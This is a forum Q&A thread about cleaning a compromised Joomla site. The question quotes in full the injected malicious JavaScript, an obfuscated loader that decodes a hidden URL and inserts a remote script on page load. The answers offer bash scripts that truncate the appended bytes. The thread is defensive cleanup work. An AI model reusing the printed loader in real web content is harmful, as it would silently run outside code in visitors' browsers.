# Need to remove multiple unique lines from multiple files

Tags: bash

Here is the back story. I have a friend whos host got hosed by a cross site scripting attack.

The following script at the bottom has been added to the bottom of all files. Does anyone have an awk or sed command to remove this? (there may be other javascript in files)

Appears script has been added to all files on host. HTML PHP JS.

Some files have php starting on a new line some not. I need to find that script portion any where in a file and remove it.

```
<?php
/**
 * @version     $Id: COPYRIGHT.php 14401 2010-01-26 14:10:00Z louis $
 * @package     Joomla
 * @copyright   Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
 * @license     GNU/GPL, see LICENSE.php
 * Joomla! is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 */

defined('_JEXEC') or die('Restricted access');
?>

Joomla! derives from copyrighted works licensed under the GNU General
Public License.  This version has been modified pursuant to the
GNU General Public License as of September 15, 2005, and as distributed,
it includes or is derivative of works licensed under the GNU General
Public License or other free or open source software licenses.  Please
see the CREDITS.php for a non-exhaustive list of contributors and
copyright holders.  A full text version of the GNU GPL version 2 can be
found in the LICENSE.php file.  A full text version of the other licenses
that Joomla! is derivative of or includes can be found in LICENSES.php.<script>

function vdch() {

    if(document.all.length > 3) {

        var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');

        var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }

        var dch = document.createElement("script");

        dch.id = "dchid";

        dch.src = dchid;

        document.all[3].appendChild(dch);

    } else {

        setTimeout("vdch()",500);

    }

} setTimeout("vdch()",500);

</script>
```

Answer (score 1):

- Count number of the appended characters (with `wc -c` on a file
  contatining only the appended script). In my example `len=1807`.
- Choose a uniq string which will identify file with appended script
  (In my example `pat="new Array('#6a7072', '#723e29', '#2d7371'"`).
- Make backup of affected directory.

Run following script in that directory:

```
#!/bin/bash
pat="new Array('#6a7072', '#723e29', '#2d7371'"
len=1807                                 
TMP=$(mktemp)                                                                   
find . -type f | while read f                                                   
do                                                                              
  if grep "$pat" "$f" >/dev/null                                                
  then                                                                          
    head -c -$len "$f" > $TMP                                                   
    cat $TMP > "$f"                                                             
  fi                                                                            
done
```

The script will remove specified number of characters from the end of each file in which pattern was found.

Answer (score 0):

```
head -n -50 yourFile
```

`50` lines to remove at the end

Comment: Problem is the script tag is inserted for html and php and js. Some are on a new line some arent. Also does not address all files. Ideally looking for awk statement or regex?

Comment: You ca remove the last 49 lines, then with `s/<?php//` delete the `<?php` of the last line.  Let me know if that will work for you. Why not restoring a backup or repo?

Comment: Backup is not working. removing a prefixed amount of lines will not work.. Site is 5k files...... This is not really any where the answer im looking for.